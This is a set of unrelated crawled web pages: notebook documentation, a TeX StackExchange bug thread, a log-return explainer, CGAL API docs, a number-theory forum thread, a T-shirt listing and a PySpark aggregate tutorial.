dls = ImageDataLoaders.from_df(
df,
path="test_iiif_anno/test_dl",
label_col="choice",
item_tfms=Resize(64),
bs=4,
)
dls.show_batch()
## Process completions directly
Label studio stores annotations as json files so we can work with these directly without using the exports from label studio. This code below shows how to do this but the above approach is likely to be more reliable.
#### load_df[source]
load_df(json_file:Union[str, Path])
#### load_completions[source]
load_completions(path:Union[str, Path])
df = load_completions("../ph/ads/ad_annotations/")
0 1602237290 457001 1.014 [illustrations] {'image': 'http://localhost:8081/data/upload/d...
# df = load_completions('../ph/photos/multi_label/')
#### anno_sample_merge[source]
anno_sample_merge(sample_df:DataFrame, annotation_df:DataFrame)
anno_sample_merge merges a DataFrame containing a sample from Newspaper Navigator and a DataFrame containing annotations
## Parameters
sample_df : pd.DataFrame A Pandas DataFrame which holds a sample from Newspaper Navigator Generated by sample.nnSample() annotation_df : pd.DataFrame A pandas DataFrame containing annotations loaded via the annotate.nnAnnotations class
## Returns
pd.DataFrame A new DataFrame which merges the two input DataFrames
sample_df = pd.read_csv("../ph/ads/sample.csv", index_col=0)
## classnnAnnotations[source]
nnAnnotations(df)
#### nnAnnotations.from_completions[source]
nnAnnotations.from_completions(path, kind, drop_dupes=True, sample_df=None)
annotations = nnAnnotations.from_completions(
)
annotations
nnAnnotations #annotations:549
annotations.labels
array(['illustrations', 'text-only'], dtype=object)
annotations.label_counts
text-only 376
illustrations 173
Name: result, dtype: int64
#### nnAnnotations.merge_sample[source]
nnAnnotations.merge_sample(sample_df)
annotations.merge_sample(sample_df)
filepath pub_date page_seq_num edition_seq_num batch lccn box score ocr place_of_publication geographic_coverage name publisher url page_url created_at id lead_time result data
0 iahi_gastly_ver01/data/sn82015737/00279529091/... 1860-03-09 447 1 iahi_gastly_ver01 sn82015737 [Decimal('0.30762831315880534'), Decimal('0.04... 0.950152 ['JTO', 'TMCE', 'An', 't%E', '3eott', 'County'... Davenport, Iowa ['Iowa--Scott--Davenport'] Daily Democrat and news. [volume] Maguire, Richardson & Co. https://news-navigator.labs.loc.gov/data/iahi_... https://chroniclingamerica.loc.gov/data/batche... 1602237486 iahi_gastly_ver01/data/sn82015737/00279529091/... 0.838 text-only iahi_gastly_ver01_data_sn82015737_00279529091_...
1 ohi_cobweb_ver04/data/sn85026050/00280775848/1... 1860-08-17 359 1 ohi_cobweb_ver04 sn85026050 [Decimal('0.5799164973813336'), Decimal('0.730... 0.985859 ['9', 'BI.', 'I', '.QJtf', 'A', 'never', 'fall... Fremont, Sandusky County [Ohio] ['Ohio--Sandusky--Fremont'] Fremont journal. [volume] I.W. Booth https://news-navigator.labs.loc.gov/data/ohi_c... https://chroniclingamerica.loc.gov/data/batche... 1602236992 ohi_cobweb_ver04/data/sn85026050/00280775848/1... 7.593 illustrations ohi_cobweb_ver04_data_sn85026050_00280775848_1...
#### nnAnnotations.export_merged[source]
nnAnnotations.export_merged(out_fn)
annotations.export_merged("testmerge.csv")
#### nnAnnotations.from_completions[source]
nnAnnotations.from_completions(path, kind, drop_dupes=True, sample_df=None)
annotations = nnAnnotations.from_completions(
)
0 1602237290 457001 1.014 illustrations txdn_argentina_ver01_data_sn84022109_002111018...
1 1602237157 179001 2.068 text-only khi_earhart_ver01_data_sn85032814_00237283260_...
from nbdev.export import notebook2script
notebook2script()
Converted 00_core.ipynb.
Converted 01_sample.ipynb.
Converted 02_annotate.ipynb.
Converted 03_inference.ipynb.
Converted index.ipynb.
|
2022-08-16 10:24:12
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.22103391587734222, "perplexity": 4910.630403502336}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882572286.44/warc/CC-MAIN-20220816090541-20220816120541-00473.warc.gz"}
|
https://tex.stackexchange.com/questions/180224/problem-when-using-pgfplots-and-pgfornament
|
# Problem when using pgfplots and pgfornament
I am trying to solve a peculiar problem, but until now no success. Here is the issue:
1. I am writing a long document (a thesis) which consists of plots, decorations, and tables.
2. When I plot the graph using pgfplots, I get the plot as below:
3. But when I include the pgfornament package, then I get the following plot:
Here are the list of included packages before using pgfornament, and which gives the correct plot.
\documentclass[12pt,english]{report}
\usepackage{setspace}
\usepackage{babel}
\usepackage{buthesis}
\usepackage{amsmath,amssymb,graphicx,amsfonts,amsthm}
\usepackage{verbatim}
\usepackage{epsfig}
\usepackage{wrapfig}
\usepackage{latexsym,amsfonts,amscd}
\usepackage{changebar}
\usepackage{enumerate}
\usepackage{tikz}
\usetikzlibrary{decorations}
\usepackage{pgfplots}
\pgfplotsset{compat=1.3}
% Used only for example text
\usepackage{lipsum}
\usepackage[footnotesize,bf]{caption} % Reduces caption font sizes
\usepackage[Bjarne]{ThesisFncychap}
\include{BjarneThesisTitles}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%-----------------------------------------------------------------
%% figures, and list of tables
\usepackage[titles]{tocloft}
\setlength{\cftbeforechapskip}{-1ex}
\setlength{\cftbeforesecskip}{-3.5ex}
\setlength{\cftbeforesubsecskip}{-3.5ex}
\setlength{\cftbeforetabskip}{-3.5ex}
\setlength{\cftbeforefigskip}{-3.5ex}
%-----------------------------------------------------------------
\dissertation
Below is the code that gives the scrambled plot. The only difference between the first and the code below is that I have included this line: \usepackage[object=vectorian]{pgfornament}. Also, I have about 10 plots like this which should automatically adjusted in two pages by latex. But after using the pgfornament package, the plots do not automatically adjust in two pages, but are in one page and some get hidden in the margin.
\documentclass[12pt,english]{report}
\usepackage{setspace}
\usepackage{babel}
\usepackage{buthesis}
\usepackage{amsmath,amssymb,graphicx,amsfonts,amsthm}
\usepackage{verbatim}
\usepackage{epsfig}
\usepackage{wrapfig}
\usepackage{latexsym,amsfonts,amscd}
\usepackage{changebar}
\usepackage{enumerate}
% Do you use TikZ?
\usepackage{tikz}
\usetikzlibrary{decorations}
\usepackage[object=vectorian]{pgfornament}
\usepackage{pgfplots}
\pgfplotsset{compat=1.3}
% Used only for example text
\usepackage{lipsum}
\usepackage[footnotesize,bf]{caption} % Reduces caption font sizes
\usepackage[Bjarne]{ThesisFncychap}
\include{BjarneThesisTitles}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%-----------------------------------------------------------------
%% figures, and list of tables
\usepackage[titles]{tocloft}
%% Aesthetic spacing redefines that look nicer to me than the defaults.
\setlength{\cftbeforechapskip}{-1ex}
\setlength{\cftbeforesecskip}{-3.5ex}
\setlength{\cftbeforesubsecskip}{-3.5ex}
\setlength{\cftbeforetabskip}{-3.5ex}
\setlength{\cftbeforefigskip}{-3.5ex}
%-----------------------------------------------------------------
\dissertation
1. The word Data is ok, because I have set it myself using \centerline{Data}
Edited:
The above code is from the document on which I am working. To make the task simpler for the readers, I am posting a very simplified version of the code where the problem still persists. This can be regarded as a minimum working code.
\title{A Very Simple \LaTeXe{} Template}
\author{
}
\date{\today}
\documentclass[12pt]{report}
\usepackage[object=vectorian]{pgfornament}
\usepackage{pgfplots}
\pgfplotsset{compat=1.3}
\begin{document}
\maketitle
\pgfplotsset{grid style={dashed}}
\pgfkeys{/pgfplots/MyLineStyle/.style={samples=50, ultra thick}}
\pgfkeys{
/pgf/number format/precision=3,
/pgf/number format/fixed zerofill=true }
\pgfplotsset{
tick label style={font=\LARGE},
label style={font=\LARGE},
legend style={font=\LARGE},
title style={font=\LARGE}
}
\tikzset{every mark/.append style={scale=2}}
\centerline {\textbf{Data}}
\begin{tikzpicture}[scale=0.70]
\begin{axis}[title={Data-Segment},
xlabel=Z,
ylabel=P,
xticklabel style={/pgf/number format/fixed,
/pgf/number format/precision=0},
grid=major,
]
\addplot+[color=black,mark options={black},mark size = 2,line width=1.5pt,mark =*,style=densely dashed] coordinates {
(10,0.331)
(20,0.329)
(30,0.323)
(40,0.328)
(50,0.322)
(60,0.325)
(70,0.323)
(80,0.320)
(90,0.321)
(100,0.319)
};\label{p5}
\addplot+[color=black,mark options={black},mark size = 2,line width=1.5pt] coordinates {
(10,0.32)
(20,0.32)
(30,0.319)
(40,0.318)
(50,0.315)
(60,0.315)
(70,0.315)
(80,0.31)
(90,0.310)
(100,0.310)
};\label{p6}
\end{axis}
\end{tikzpicture}
\begin{tikzpicture}[scale=0.70]
\begin{axis}[title={Data-Segment},
xlabel=Z,
ylabel=P,
legend style={ at={(1,0.5)},
anchor=east},
xticklabel style={/pgf/number format/fixed,
/pgf/number format/precision=0},
grid=major]
\addplot[color=black,mark options={black},mark size = 2,line width=1.5pt,mark =*,style=densely dashed] coordinates {
(10,0.331)
(20,0.329)
(30,0.323)
(40,0.328)
(50,0.322)
(60,0.325)
(70,0.323)
(80,0.320)
(90,0.321)
(100,0.319)
};
\addplot+[color=black,mark options={black},mark size = 2,line width=1.5pt,mark=square*] coordinates {
(10,0.32)
(20,0.32)
(30,0.32)
(40,0.319)
(50,0.317)
(60,0.312)
(70,0.312)
(80,0.31)
(90,0.309)
(100,0.31)
};
\end{axis}
\end{tikzpicture}
\newline
\begin{tikzpicture}[scale=0.70]
\begin{axis}[title={Data-Segment},xlabel=Z,ylabel=P,legend style={ at={(1,0.5)}, anchor=east},grid=major,xticklabel style={/pgf/number format/fixed,
/pgf/number format/precision=0},
]
\addplot[color=black,mark options={black},mark size = 2,line width=1.5pt,mark =*,style=densely dashed] coordinates {
(10,0.331)
(20,0.329)
(30,0.323)
(40,0.328)
(50,0.322)
(60,0.325)
(70,0.323)
(80,0.320)
(90,0.321)
(100,0.319)
};
\addplot+[color=black,mark options={black},mark size = 2,line width=1.5pt,mark=square*] coordinates {
(10,0.320)
(20,0.319)
(30,0.319)
(40,0.320)
(50,0.314)
(60,0.318)
(70,0.319)
(80,0.32)
(90,0.322)
(100,0.328)
};
\end{axis}
\end{tikzpicture}
\bibliographystyle{abbrv}
\bibliography{simple}
\end{document}
• It is great you've posted code but please reduce it and complete it to a Minimum Working Example i.e. a complete, small document which people can compile to reproduce the issue. I, at least, do not have ThesisFncychap and have no idea where to obtain it. In any case, reducing the code to the minimum makes it much easier for people to understand and work on the problem. – cfr May 25 '14 at 2:25
• @cfr Thanks for pointing out a shortcoming in my question. I have added a MWE now. I hope this can help the readers. – puser May 25 '14 at 2:54
• I have downloaded pgfornament from altermundus.com/pages/tkz/ornament/index.html and could not reproduce the issue. Could you verify that it is still present with the most recent version of pgfornament? – Christian Feuersänger May 30 '14 at 18:17
• @Christian: I again installed all the components of pgfornament on my system the way it has been asked in the ornaments.pdf file that comes along with the package. But the problem still remains. Although I have come up with a quick-fix solution myself whereby I obtained the eps files of those graphs using externalization commands in latex, and then embedded those eps files in my thesis using \includegraphics. But directly using the pgfplots code with pgfornament does not work for me. I am using latex on Red Hat Linux. Ver: pdfTeX using libpoppler 3.141592-1.40.3-2.2 (Web2C 7.5.6) – puser May 31 '14 at 2:44
• latex --version command gives me the following output: pdfTeX using libpoppler 3.141592-1.40.3-2.2 (Web2C 7.5.6) kpathsea version 3.5.6 Copyright 2007 Peter Breitenlohner (eTeX)/Han The Thanh (pdfTeX). Kpathsea is copyright 2007 Karl Berry and Olaf Weber. (...some copyright information...) Compiled with libpng 1.2.46; using libpng 1.2.49 Compiled with zlib 1.2.3; using zlib 1.2.3 Compiled with libpoppler – puser May 31 '14 at 2:45
I have managed to reproduce the issue (don't know why my approach yesterday failed).
The root cause is a bug in pgfornament.sty: it overwrites the tikz key at globally. If I uncomment pgfornament.sty:97 such that it becomes
\tikzset{%
%at/.code={\def\ornamenttopos{#1}},
options/.style={options default,#1},
ornament symmetry/.code={\def\ornamenttosymmetry{#1}},
everything works.
I suggest you file a bug report for pgfornament.sty.
• @alain-matthes FYI – Christian Feuersänger May 31 '14 at 6:56
• Thanks. I will file this as a bug report with the author of pgfornament. – puser May 31 '14 at 7:35
• Thanks Christian to find this problem. Possible is to write ornament/at/.code={\def\ornamenttopos{#1}}, instead of at/.code={\def\ornamenttopos{#1}}. Then you need to write ornament/atinstead of at if you want to use this option – Alain Matthes May 31 '14 at 9:27
• I updated the package – Alain Matthes May 31 '14 at 17:00
|
2021-06-19 15:22:24
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9091320633888245, "perplexity": 4562.33389768364}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-25/segments/1623487648373.45/warc/CC-MAIN-20210619142022-20210619172022-00503.warc.gz"}
|
https://www.rateofreturnexpert.com/log-return/
|
Log Return
Formula
The logarithmic return is a way of calculating the rate of return on an investment. To calculate it you need the inital value of the investment V_i, the final value V_f and the number of time periods t. You then take the natural logarithm of V_f divided by V_i, and divide the result by t:
R = ln(V_f/V_i) / t xx 100%
This value is normally expressed as a percentage, so you also multiply by 100.
The calculated rate will depend on the value of t that you use. If t is the number of years, then you get an annual rate. This then gives you the continuously compounded annual interest rate that you would need to receive in order to match the return on this investment.
Comparing Log Returns
Because the formula for log return takes the duration of the investment into account, it can be used to compare multiple investments that cover different lengths of time. Typically you would compare multiple investments using an annual rate, so t in the above formula will be the number of years.
The log return is less useful for comparing our investment with other investments that have a fixed interest rate, such as bank savings accounts, because these are normally quoted as a yearly compounded interest rate, and the log return is a continuously compounded rate.
Example
Jenny is a property investor. She buys a house for 100000. Exactly 3 years later she sells it for 120000. The logarithmic return is then:
R_j = ln(120000/100000) / 3 xx 100%
R_j = 6.08%
(I've rounded the percentage up to 2 decimal places here.)
Jenny's friend Stan also buys a house. He pays 95000 and sells it 18 months (1.5 years) later for 105000. Jenny and Stan would like to compare their returns, so Stan also calculates the log return:
R_s = ln(105000/95000) / 1.5 xx 100%
R_s = 6.67%
From this we can see that Stan has got a better logarithmic rate of return than Jenny on his property investment.
|
2021-11-27 05:13:33
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5513047575950623, "perplexity": 1009.0332887016272}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964358118.13/warc/CC-MAIN-20211127043716-20211127073716-00402.warc.gz"}
|
https://doc.cgal.org/4.7/Convex_hull_3/classConvexHullPolyhedron__3.html
|
CGAL 4.7 - 3D Convex Hulls
ConvexHullPolyhedron_3 Concept Reference
## Definition
Requirements of the polyhedron type built by the function CGAL::convex_hull_3().
Has Models:
CGAL::Polyhedron_3
## Types
typedef unspecified_type Point_3
type of point stored in a vertex
typedef unspecified_type Vertex
a model of ConvexHullPolyhedronVertex_3
typedef unspecified_type Halfedge
a model of ConvexHullPolyhedronHalfedge_3
typedef unspecified_type Facet
a model of ConvexHullPolyhedronFacet_3
typedef unspecified_type Halfedge_data_structure
halfedge data structure
typedef unspecified_type Halfedge_handle
handle to halfedge
typedef unspecified_type Halfedge_iterator
iterator for halfedge
typedef unspecified_type Facet_handle
handle to facet
typedef unspecified_type Facet_iterator
iterator for facet
## Creation
Only a default constructor is required.
ConvexHullPolyhedron_3 ()
## Operations
Facet_iterator facets_begin ()
iterator over all facets (excluding holes).
Facet_iterator facets_end ()
past-the-end iterator.
Halfedge_iteratorhalfedges_begin ()
iterator over all halfedges.
Halfedge_iteratorhalfedges_end ()
past-the-end iterator.
Halfedge_handle make_tetrahedron (Point_3 p1, Point_3 p2, Point_3 p3, Point_3 p4)
adds a new tetrahedron to the polyhedral surface with its vertices initialized with p1, p2, p3 and p4. More...
void erase_facet (Halfedge_handle h)
removes the incident facet of h and changes all halfedges incident to the facet into border edges or removes them from the polyhedral surface if they were already border edges.
Halfedge_handle add_vertex_and_facet_to_border (Halfedge_handle h, Halfedge_handle g)
creates a new facet within the hole incident to h and g by connecting the tip of g with the tip of h with two new halfedges and a new vertex and filling this separated part of the hole with a new facet, such that the new facet is incident to g. More...
Halfedge_handle add_facet_to_border (Halfedge_handle h, Halfedge_handle g)
creates a new facet within the hole incident to h and g by connecting the tip of g with the tip of h with a new halfedge and filling this separated part of the hole with a new facet, such that the new facet is incident to g. More...
Halfedge_handle fill_hole (Halfedge_handle h)
fills a hole with a newly created facet. More...
void delegate (Modifier_base< Halfedge_data_structure > &m)
calls the operator() of the modifier m. More...
## Member Function Documentation
Halfedge_handle ConvexHullPolyhedron_3::add_facet_to_border ( Halfedge_handle h, Halfedge_handle g )
creates a new facet within the hole incident to h and g by connecting the tip of g with the tip of h with a new halfedge and filling this separated part of the hole with a new facet, such that the new facet is incident to g.
Returns the halfedge of the new edge that is incident to the new facet.
Halfedge_handle ConvexHullPolyhedron_3::add_vertex_and_facet_to_border ( Halfedge_handle h, Halfedge_handle g )
creates a new facet within the hole incident to h and g by connecting the tip of g with the tip of h with two new halfedges and a new vertex and filling this separated part of the hole with a new facet, such that the new facet is incident to g.
Returns the halfedge of the new edge that is incident to the new facet and the new vertex.
void ConvexHullPolyhedron_3::delegate ( Modifier_base< Halfedge_data_structure > & m)
calls the operator() of the modifier m.
See Modifier_base for a description of modifier design and its usage.
Halfedge_handle ConvexHullPolyhedron_3::fill_hole ( Halfedge_handle h)
fills a hole with a newly created facet.
Makes all border halfedges of the hole denoted by h incident to the new facet. Returns h.
Halfedge_handle ConvexHullPolyhedron_3::make_tetrahedron ( Point_3 p1, Point_3 p2, Point_3 p3, Point_3 p4 )
adds a new tetrahedron to the polyhedral surface with its vertices initialized with p1, p2, p3 and p4.
Returns that halfedge of the tetrahedron which incident vertex is initialized with p1, the incident vertex of the next halfedge with p2, and the vertex thereafter with p3. The remaining fourth vertex is initialized with p4.
|
2019-10-15 17:59:53
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.29971420764923096, "perplexity": 4480.36462368646}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986660067.26/warc/CC-MAIN-20191015155056-20191015182556-00204.warc.gz"}
|
https://www.cheenta.com/forums/topic/number-theory-2/
|
Select Page
2 voices
3 replies
• Author
Posts
• #24794
Kaveri Kayra
Participant
#25059
swastik pramanik
Participant
(b) Let $$n=\prod_{k=1}^r p_k^{a_k}=p_1^{a_1}p_2^{a_2}p_3^{a_3}\cdots p_r^{a_r}$$ . So, $$\phi(n) =n\left(1-\frac{1}{p_1}\right) \left(1-\frac{1}{p_2}\right)\cdots \left(1-\frac{1}{p_r}\right)$$ .
For any prime $$p$$ the inequality $$2p-2\geq p$$ or, $$\frac{p-1}{p}\geq \frac{1}{2}$$ So, we have $$r$$ prime number for which the inequality is true. Multiplying them gives $$\left(1-\frac{1}{p_1}\right) \left(1-\frac{1}{p_2}\right)\cdots \left(1-\frac{1}{p_r}\right)\geq \frac{1}{2^r}$$ multiplying both sides with $$n$$ gives So, we want to show that $$n\left(1-\frac{1}{p_1}\right) \left(1-\frac{1}{p_2}\right)\cdots \left(1-\frac{1}{p_r}\right)\geq \frac{n}{2^r}$$ or concisely $$\phi(n)\geq \frac{n}{2^r}$$ as required.
#25089
swastik pramanik
Participant
(a) Let $$n=2^{k_0}p_1^{k_1}p_2^{k_2}\cdots p_r^{k_r}$$ . So, $$\phi(n)=2^{k_0-1}p_1^{k_1-1}p_2^{k_2-1}\cdots p_r^{k_r-1}(2-1)(p_1-1)(p_2-1)\cdots (p_r-1)$$ . Now, we use the inequalities $$k-\frac{1}{2}\ge \frac{k}{2}$$ and $$p-1>\sqrt{p}$$ for $$p>2$$. So, we have $$\phi(n)\le 2^{k_0-1}p_1^{k_1/2}p_2^{k_2/2}\cdots p_r^{k_r/2}\ge \frac{1}{2}\sqrt{n}$$ .
Now, also $$p-1<p$$ . So, $$\phi(n)\le 2^{k_0}p_1^{k_1}p_2^{k_2}\cdots p_r^{k_r}=n$$ .
Combining them up we get $$\frac{1}{2}\sqrt{n}\le \phi(n)\le n$$ as required.
(c) Let $$p$$ be the smallest prime divisor of $$n$$ so that, $$p\le \sqrt{n}$$. Then $$\phi(n) \le n\left(1-\frac{1}{p}\right)$$ . We know that, $$p\le \sqrt{n}$$ which implies $$1-\frac{1}{p}\le 1-\sqrt{n}$$. So, $$\phi(n) \le n\left(1-\frac{1}{p}\right)\le n\left(1-\frac{1}{\sqrt{n}}\right)=n-\sqrt{n}$$.
Hence, we are done! 🙂
#25090
swastik pramanik
Participant
In part (c) in line 3 the inequality should be $$1-\frac{1}{p}\le 1-\frac{1}{\sqrt{n}}$$ not $$1-\frac{1}{p}\le 1-\sqrt{n}$$…..
topic tags
You must be logged in to reply to this topic.
|
2019-01-23 18:11:11
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 2, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9772710204124451, "perplexity": 354.3612405639913}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547584336901.97/warc/CC-MAIN-20190123172047-20190123194047-00593.warc.gz"}
|
https://www.spreadshirt.com/women+it+never+gets+easier+t-shirts
|
It Never Gets Easier T-Shirts for Women
Filter
x
Categories
+
Women
Women
Show all
Product features
-
Colors
-
black
beige
grey
white
blue
aqua
green
yellow
orange
red
pink
purple
Sizes
-
View
Sort by
Relevance
GET STRONGER
by
XYC
it never gets easier
losing a pet never gets easier
It Never Gets Easier You Just Get Stronger
It Never Gets Easier You Just Get Stronger
It Never Gets Easier, You Just Get Better.
It never gets easier you just get better
It Never Gets Easier You Just Get Stronger
It never gets easier you just get better
Funny Running Design It Never Gets Easier
Its Never Gets Easier You Just Get Stronger Nurse
Never Gets Easier You Just Get Better- Gaming - TB
Never Gets Easier You Just Get Better- Gaming - TB
Aerobic - It Never Gets Easier You Just Get Stro
Yoga- it never gets easier you just get stronger
It Never gets Easier,You Just Get Better Ping Pong
Yoga it never gets easier you just get stronger
It Never Get Easier You Just Get Better T-Shirt
IT NEVER GETS EASIER YOU JUST GET STRANGER Quote
Never Gets Easier You Just Get Better- Gaming - TB
Biker - It never gets easier you just get faster
New
Life Doesn't get easier, You just get stronger.
GET STRONGER
by
XYC
ER Nurse Shirt
You just get stronger!
It's a match!
It's a match!
It's a match!
I do gardening for a living. funny weed leaf shirt
Customers looked for
|
2018-10-18 17:12:59
|
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8454437255859375, "perplexity": 9756.660193681288}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-43/segments/1539583511889.43/warc/CC-MAIN-20181018152212-20181018173712-00246.warc.gz"}
|
https://napsterinblue.github.io/notes/spark/basics/aggregate_fn/
|
# The Aggregate Function
import findspark
findspark.init()
import pyspark
sc = pyspark.SparkContext()
# aggregate
Let’s assume an arbirtrary sequence of integers.
import numpy as np
vals = [np.random.randint(0, 10) for _ in range(20)]
vals
[5, 8, 9, 3, 0, 6, 3, 9, 8, 3, 4, 9, 5, 0, 8, 4, 2, 3, 2, 8]
rdd = sc.parallelize(vals)
### Finding the mean
Assume further that we can’t just call the handy mean method attached to our rdd object.
rdd.mean()
4.95
We’d create the mean by getting a sum of all values and a total count of numbers.
sum(vals) / len(vals)
4.95
In Spark, we recreate this logic using a two-fold reduce via a Sequence Operation and a Combination Operation.
The seqOp is a reduce step that happens per-partition. Whereas the combOp is how we take the reduced values and bring them together.
total, counts = rdd.aggregate(zeroValue=(0, 0),
seqOp=(lambda x, y: (x[0] + y, x[1] + 1)),
combOp=(lambda x, y: (x[0] + y[0], x[1] + y[1])))
total / counts
4.95
## Under the Hood
For purposes of demonstration, let’s look at something a bit easier.
Starting at 0. Simple sum. Then take the max.
rdd.aggregate(zeroValue=0,
seqOp=lambda x, y: x + y,
combOp=lambda x, y: max(x, y))
29
Why did we get this value? Peeking inside the partitions of rdd we can see the distinct groups.
brokenOut = rdd.glom().collect()
brokenOut
[[5, 8, 9, 3, 0], [6, 3, 9, 8, 3], [4, 9, 5, 0, 8], [4, 2, 3, 2, 8]]
The sum inside each partition looks like
[sum(x) for x in brokenOut]
[25, 29, 26, 19]
Thus, taking the max of each of these intermediate calculations looks like
max([sum(x) for x in brokenOut])
29
Thus, we must be careful in writing our seqOp and combOp functions, as their results depend on how the data is partitioned.
|
2021-01-16 06:16:49
|
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5431340336799622, "perplexity": 2192.2628060897227}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703500028.5/warc/CC-MAIN-20210116044418-20210116074418-00527.warc.gz"}
|
